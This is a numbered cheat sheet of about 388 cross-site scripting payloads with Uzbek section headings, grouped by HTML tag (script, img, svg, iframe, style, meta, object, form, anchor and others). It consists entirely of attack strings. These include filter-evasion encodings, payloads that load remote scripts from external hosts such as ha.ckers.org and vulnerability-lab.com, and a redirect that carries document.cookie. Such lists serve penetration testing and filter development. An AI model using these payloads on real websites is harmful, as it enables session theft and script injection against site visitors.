
================================================================================
1. SCRIPT tegi orqali XSS
================================================================================

1. <script>alert('XSS')</script>
2. "><script>alert('XSS')</script>
3. "/><script>alert('XSS')</script>
4. '><script>alert('XSS')</script>
5. >'"<script>alert('XSS')</script>
6. /><script>alert('XSS')</script>
7. ';</script><script>alert('XSS')</script>
8. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
9. <<SCRIPT>alert("XSS");//<</SCRIPT>
10. <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
11. <SCRIPT SRC=//ha.ckers.org/.j>
12. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
13. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
14. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
15. <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
16. <SCRIPT>alert('XSS')</SCRIPT>
17. <scRiPt>alert(1);</scrIPt>
18. <scr<script>ipt>alert(1)</scr<script>ipt>
19. <script>alert(document.location)</script>
20. <script>alert(document.cookie)</script>
21. <script>alert(1);</script>
22. <script>prompt(1);</script>
23. <script>confirm (/xss by evan/);</script>
24. <script src="http://rhainfosec.com/evil.js">
25. <ScriPt>ALeRt("i am here")</scriPt>
26. %00<script>alert('XSS')</script>
27. ?>'"<script>alert(90889)</script>
28. <SCRIPT>decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;</script>
29. <script>String.fromCharCode(107, 51, 110, 122, 48)</script>
30. <script>alert('httpOnly Test: '  +document.cookie)</script>
31. </b><script>alert(7)</script>
32. <script>alert('XSS')</script>
33. "><script>alert(123);</script>
34. "><sCrIpT>alert(02164699099)</sCrIpT>
35. %3CSCRIPT%3Ealert%283%29%3C%2FSCRIPT%3E
36. </script><script type=text/javascript>alert(123)</script>
37. <script>window.navigate("http://localhost/calismalar/xss/index.php?cookie=+document.cookie")</script>
38. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
39. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
40. <script>alert(document.cookie)</script>@gmail.com
41. <script>alert(document.cookie)</script><div style="1@gmail.com
42. set vlan name 1337 <script>alert(document.cookie)</script>
43. add <!--#exec cmd="/bin/echo '<SCR'"><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'">
44. add user <script>alert(document.cookie)</script>
45. <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
46. <script>document.cookie=true;</script>
47. <SCRIPT>document.cookie=true;</SCRIPT>
48. <SCRIPT>document.cookie=true;//<</SCRIPT>
49. <<script>document.cookie=true;</script>
50. <script>document.cookie=true;//--></script>
51. <!-- -- --><script>document.cookie=true;</script><!-- -- -->
52. &<script>document.cookie=true;</script>
53. <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
54. <%<!--'%><script>alert(1);</script>-->
55. <script src="data:text/javascript,alert(1)"></script>
56. <SCRIPT>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</SCRIPT>
57. <script>+-+-1-+-+alert(1)</script>
58. <script itworksinallbrowsers>/*<script* */alert(1)</script
59. <script x> alert(1) </script 1=2
60. <svg><script>//&NewLine;confirm(1);</script </svg>
61. <svg><script onlypossibleinopera:-)> alert(1)
62. <svg><script ?>alert(1)
63. <script ^__^>alert(String.fromCharCode(49))</script ^__^>
64. </style ><script  :-(>/**/alert(document.location)/**/</script  :-(>
65. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /**/>
66. <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
67. <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
68. <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
69. </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>
70. <SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
71. <SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
72. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>

================================================================================
2. IMG tegi orqali XSS
================================================================================

73. <IMG SRC="javascript:alert('XSS');">
74. <IMG SRC=javascript:alert('XSS')>
75. <IMG SRC=JaVaScRiPt:alert('XSS')>
76. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
77. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
78. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
79. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
80. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
81. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
82. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
83. <IMG SRC="jav	ascript:alert('XSS');">
84. <IMG SRC="jav&#x09;ascript:alert('XSS');">
85. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
86. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
87. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
88. <IMG SRC=" &#14;  javascript:alert('XSS');">
89. <IMG SRC=# onmouseover="alert('xxs')">
90. <IMG SRC= onmouseover="alert('xxs')">
91. <IMG onmouseover="alert('xxs')">
92. <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
93. <IMG DYNSRC="javascript:alert('XSS')">
94. <IMG LOWSRC="javascript:alert('XSS')">
95. <IMG SRC='vbscript:msgbox("XSS")'>
96. <IMG SRC="mocha:[code]">
97. <IMG SRC="livescript:[code]">
98. <img src=x onerror=alert(1)>
99. <img src=x onerror=alert(0)>
100. "><img src=x onerror=alert(document.domain)>
101. "><img src=bogus onError=alert(23)>
102. "><img src=x onerror=alert('hacı')>&action=edit&comment=123">
103. <img src=1 onerror=innerHTML=location.hash>
104. <img src=sa onerror=eval(document.location.hash.substr(1))>
105. <img/src='x'/onerror='alert(1)'/>
106. <img/src="x"/onerror="alert(1)"/>
107. <img src=/ onerror=alert(1)>
108. <img/src/onerror=alert(1)>
109. <img src=x onerror="javascript:window.onerror=alert;throw 1">
110. <img/src=`%00` onerror=this.onerror=confirm(1)
111. <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
112. <img/src=@  onerror = prompt('&#49;')
113. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
114. <img src=`xx:xx`onerror=alert(1)>
115. <img src="<img src=search"/onerror=alert("xss")//">
116. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
117. <IMG SRC="javascript:alert('XSS')">
118. <img src=1 onerror=alert(document.cookie);>
119. <"><img src=1 onerror=alert(document.cookie);>
120. <IMG SRC=JaVaScRiPt:alert(document.cookie)>
121. <IMG ""><SCRIPT>alert(document.cookie)</SCRIPT>">
122. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
123. <IMG SRC="jav	ascript:alert(document.cookie);">
124. <IMG SRC="jav&#x09;ascript:alert(document.cookie);">
125. <img src=x onerror=window.open('https://www.google.com/');>
126. <IMG SRC="jav  ascript:alert('CrossSiteScripting');">
127. <IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
128. <IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
129. <IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
130. <IMG SRC="   javascript:alert('CrossSiteScripting');">
131. <IMG SRC="javascript:alert('CrossSiteScripting')">
132. <IMG DYNSRC="javascript:alert('CrossSiteScripting')">
133. <IMG LOWSRC="javascript:alert('CrossSiteScripting')">
134. <IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
135. <IMG SRC="mocha:[code]">
136. <IMG SRC="livescript:[code]">
137. <img src="blah"onmouseover="document.cookie=true;">
138. <img src="blah>" onmouseover="document.cookie=true;">
139. <img src="javascript:document.cookie=true;">
140. <img dynsrc="javascript:document.cookie=true;">
141. <img src="mocha:document.cookie=true;">
142. <img src="livescript:document.cookie=true;">
143. <img src=&{document.cookie=true;};>
144. <IMG SRC="jav ascript:document.cookie=true;">
145. <IMG SRC="javascript:document.cookie=true;">
146. <IMG SRC="  javascript:document.cookie=true;">
147. <IMG DYNSRC="javascript:document.cookie=true;">
148. <IMG LOWSRC="javascript:document.cookie=true;">
149. <IMG SRC="javascript:document.cookie=true;">
150. <img/src=''onerror='alert(atob(/PDMgVHJlbGxv/.source))'
151. <img/src=1+onerror=alert('hacı')>
152. <img src=x onerror=prompt(1);>
153. "><img src=x onerror=prompt(1);>
154. "><img src=x.png onerror=prompt("XSS");>
155. <img src=x onerror=alert(document.domain)>
156. "><img+src=1+onerror=alert('hacı')>&action=edit&comment=123">
157. <IMG SRC='vbscript:msgbox("CrossSiteScripting")'>

================================================================================
3. SVG va onload orqali XSS
================================================================================

158. <svg onload="prompt(/xss by evan/);">	
159. <svG onLoad=prompt(1)>
160. <svg/onload=prompt(1);>
161. <svg/onload=alert(1)>
162. <svg/onload;=alert(1)>
163. /<svg%20onload=alert(eval('document'+unescape(unescape("%252e"))%2b'domain'))>
164. <svg%20xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle%20r=100%20/><animate%20attributeName="xlink:href"%20values=";javascript:alert(1)"%20begin="0s"%20dur="0.1s"%20fill="freeze"/>
165. <svg><script>alert&#40/1/&#41</script>
166. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'}
167. <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
168. <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
169. <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg>
170. <svg contentScriptType=text/vbs><script>MsgBox+1
171. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'}
172. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;</script>
173. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script>

================================================================================
4. IFRAME tegi orqali XSS
================================================================================

174. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
175. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
176. <iframe src=http://ha.ckers.org/scriptlet.html <
177. <iframe src="javascript:alert('XSS');"> 
178. <iframe/%00/ src=javaSCRIPT&colon;alert(1)
179. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
180. <iframesrc="javascript:alert(2)">
181. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
182. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
183. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
184. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
185. <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
186. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
187. <iframe src="javascript:document.cookie=true;> 
188. <iframe src=http://vulnerability-lab.com/>@gmail.com
189. <"><iframe src=http://vulnerability-lab.com/>1337
190. set system name <iframe src=http://www.vulnerability-lab.com>
191. add topic <iframe src=http://www.vulnerability-lab.com>
192. <iframe src=http://vulnerability-lab.com>1337+1
193. <iframe src=http://vulnerability-lab.com/index.html <
194. "></iframe><script>alert(document.cookie)</script>xss
195. ><iframe onclick=alert(Evan)></iframe>
196. <iframe/onreadystatechange=alert(1)
197. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
198. "><iframe src="/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)"
199. %3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E
200. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

================================================================================
5. BODY va HTML event handlerlari orqali XSS
================================================================================

201. <BODY BACKGROUND="javascript:alert('XSS')">
202. <BODY ONLOAD=alert('XSS')>
203. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
204. <body onload=prompt(1);>
205. <body/onload=&lt;!--&gt;&#10alert(1)>
206. <body/onhashchange=alert(1)><a href=#>clickit
207. <body onfocus="location='javascrpt:alert(1) >123
208. <BODY BACKGROUND="javascript:document.cookie=true;">
209. <BODY ONLOAD=document.cookie=true;>
210. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
211. <body onload="document.cookie=true;">

================================================================================
6. STYLE va CSS expression orqali XSS
================================================================================

212. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
213. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
214. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
215. <DIV STYLE="width: expression(alert('XSS'));">
216. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
217. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
218. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
219. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
220. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
221. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
222. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
223. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
224. <XSS STYLE="xss:expression(alert('XSS'))">
225. <XSS STYLE="behavior: url(xss.htc);">
226. exp/*<A STYLE='no\xss:noxss("*//*"); xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
227. 1"sTYLe='acu:Expre/**/SSion(prompt(1))'bad=">
228. background-image: url(javascript:alert(1))
229. #444;background-image: expression(alert(1));
230. width:expression(eval( String.fromCharCode(100,111,99,117,109,...)))
231. <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
232. <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
233. <DIV STYLE="width: expression(document.cookie=true);">
234. <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
235. <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
236. <STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
237. <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
238. <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
239. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
240. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
241. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
242. <style><!--</style><script>document.cookie=true;//--></script>
243. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
244. <div style="background-image: url(javascript:document.cookie=true;);">
245. <div style="behaviour: url([link to code]);">
246. <div style="binding: url([link to code]);">
247. <div style="width: expression(document.cookie=true;);">
248. <style type="text/javascript">document.cookie=true;</style>
249. left:expression(eval(alert(1)))
250. <style><!--</style><script>document.cookie=true;//--></script>
251. <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
252. <DIV STYLE="background-image:\0075\0072\006C...">
253. <DIV STYLE="width: expression(alert('CrossSiteScripting'));">
254. <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
255. <STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>
256. <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
257. <STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
258. <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
259. <STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
260. <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
261. <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
262. <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))">

================================================================================
7. META tegi orqali XSS
================================================================================

263. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
264. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
265. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
266. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
267. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
268. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
269. <meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
270. <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
271. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
272. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.cookie=true;">
273. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
274. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
275. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
276. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,...">
277. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
278. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
279. <META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
280. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
281. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
282. <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">

================================================================================
8. OBJECT va EMBED tegi orqali XSS
================================================================================

283. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
284. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
285. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
286. <EMBED SRC="data:image/svg+xml;base64,..." type="image/svg+xml" AllowScriptAccess="always"></EMBED>
287. <object data="javascript:alert(0)">
288. <object><param name="src" value="javascript:alert(0)"></param></object>
289. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
290. <object/data=//goo.gl/nlX0P?>
291. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
292. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
293. <embed/src=//goo.gl/nlX0P>
294. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
295. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
296. <EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>
297. <OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
298. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>
299. <object classid="clsid:ae24fdae-03c6-11d1-8b76-0080c744f389"><param name=url value=javascript:document.cookie=true></object>
300. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
301. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
302. <object classid="clsid:..." codebase="javascript:document.cookie=true;">
303. <applet code="javascript:confirm(document.cookie);">
304. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
305. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
306. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

================================================================================
9. LINK tegi orqali XSS
================================================================================

307. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
308. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
309. <link href="javascript:alert(1)" rel="next">
310. <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
311. <link rel="stylesheet" href="javascript:document.cookie=true;">
312. <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
313. <LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">

================================================================================
10. FORM va INPUT tegi orqali XSS
================================================================================

314. <form action="javascript:alert(document.domain)"><button>Click</button></form>
315. <form><button formaction=javascript&colon;alert(/xssbyevan/)>CLICKME
316. <form action="Javascript:alert(1)"><input type=submit>
317. <form><button formaction=javascript&colon;alert(1)>CLICKME
318. <formaction='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
319. <isindexformaction="javascript:alert(1)" type=image>
320. <input type="image" formaction=JaVaScript:alert(0)>
321. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
322. <input type="hidden" name="asdhakjshdkjashdkjashd" value="\" onload=confirm(000) />" />
323. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
324. <input value=<><iframe/src=javascript:confirm(1)>
325. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
326. &#00;</form><input type&#61;"date" onfocus="alert(1)">
327. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
328. <isindex type=image src=1 onerror=alert(1)>
329. <isindex action=javascript:alert(1) type=image>
330. <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
331. <isindex action=data:text/html, type=image>
332. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
333. <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
334. <input type="image" dynsrc="javascript:document.cookie=true;">

================================================================================
11. HREF (A tegi) orqali XSS
================================================================================

335. <A HREF="http://66.102.7.147/">XSS</A>
336. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
337. <A HREF="http://1113982867/">XSS</A>
338. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
339. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
340. <A HREF="htt	p://6&#9;6.000146.0x7.147/">XSS</A>
341. <A HREF="//www.google.com/">XSS</A>
342. <A HREF="//google">XSS</A>
343. <A HREF="http://ha.ckers.org@google">XSS</A>
344. <A HREF="http://google:ha.ckers.org">XSS</A>
345. <A HREF="http://google.com/">XSS</A>
346. <A HREF="http://www.google.com./">XSS</A>
347. <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
348. <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
349. <a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>
350. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
351. <a href="java%1B(Jscript:alert(1)">test
352. <a%20href="java%1B%28Jscript:alert%281%29">
353. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a>
354. <a href="data:text/html;blabla,...">Click Me</a>
355. <a onmouseover="alert(document.cookie)">xxs link</a>
356. <a onmouseover=alert(document.cookie)>xxs link</a>
357. <a href="javascript&colon;alert&lpar;document&period;cookie&rpar;">Click Here</a>
358. #!prettyPhoto/<a onclick="alert(/XSS by Evan/);">/
359. <a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
360. <a onmouseover="javascript:window.onerror=alert;throw 1>
361. <a onmouseover=location='javascript:alert(1)>click
362. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
363. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
364. <a href="javascript\u0061lert&#x28;1&#x29;">X
365. <><><><><><a onmouseover=prompt(1337)>XSS</a>
366. <a href="about:<script>document.cookie=true;</script>">
367. <a href="javascript#document.cookie=true;">
368. <A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>
369. <A HREF="http://server.com/">CrossSiteScripting</A>
370. <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
371. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
372. <math><a xlink:href="//jsfiddle.net/t846h/">click

================================================================================
12. Audio va Video tegi orqali XSS
================================================================================

373. <video src=1 onerror=alert(1)>
374. <audio src=1 onerror=alert(1)>
375. <audio src=x onerror=alert(1)>
376. <video src=x onerror=prompt(1);>
377. <audio src=x onerror=prompt(1);>
378. <video><source onerror="javascript:alert(1)">
379. <aUdIo SrC=x OnErRoR=alert(71465)>');"

================================================================================
13. TABLE, TD, TR tegi orqali XSS
================================================================================

380. <TABLE BACKGROUND="javascript:alert('XSS')">
381. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
382. <TABLE BACKGROUND="javascript:document.cookie=true;">
383. <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
384. <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
385. <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">

================================================================================
14. BASE tegi orqali XSS
================================================================================

386. <BASE HREF="javascript:alert('XSS');//">
387. <BASE HREF="javascript:document.cookie=true;//">
388. <BASE HREF="javascript:alert('CrossSiteScripting');//">

================================================================================
